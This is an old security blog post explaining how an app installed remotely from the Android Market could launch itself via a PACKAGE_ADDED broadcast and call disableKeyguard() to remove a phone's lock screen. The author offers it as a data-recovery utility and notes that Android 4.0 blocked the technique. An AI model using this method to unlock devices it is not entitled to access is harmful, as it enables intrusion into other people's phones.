Android Lock Screen Bypass

Note: This post is very old. Google made a change in Android 4.0 for security reasons so that newly installed apps cannot be started with a broadcast intent until the user runs it manually at least once. Therefore this technique doesn't work on devices running 4.0 or later.

So far I have tried out 5 Android devices here in the UK (test device, personal phone, and those of friends). They all lack the same feature - if you forget your PIN or pattern code, there doesn't seem to be a way to reset it. You are effectively locked out of your device. Searching online I see that some people are able to reset it after a certain number of attempts by entering their GMail credentials, but I am unable to do so on mine or others I have tried.

We now have the fantastic web based Android Market, and I wrote about a few minor security findings here. One of the common responses I saw to articles talking about the threat of malware distribution was that when remotely installed, an application doesn't automatically run and the user would have to manually launch the malware. This is not actually correct, and to demonstrate I decided to create a legitimate utility which can be deployed to a locked phone, executed remotely, and set to disable the lock screen. This will yield access to a locked device so that the user may go in and backup their data.

How it works

Quite simple really. Android sends out a number of broadcast messages which an application can receive, such as SMS received or WiFi disconnected. An application has to register its receiver to receive broadcast messages and this can be done at run time, or for some messages, at install time. When a relevant message comes in it is sent to the application and if the application is not running it will be started automatically.

After testing out various broadcast messages the best one I found for the purpose of this utility was android.intent.action.PACKAGE_ADDED. This exists in all APIs since version 1 and is triggered when an application is installed. So to get the application to execute remotely, we first deploy it from the Android Market, then deploy any other application which will cause the first one to launch.

Once launched it is just a matter of calling the disableKeyguard() method in KeyguardManager. This is a legitimate API to enable applications to disable the screen lock when, say, an incoming phone call is detected. After finishing the call the app ought to enable the screen lock again, but we just keep it disabled.

Get the Screen Lock Bypass application: Google Play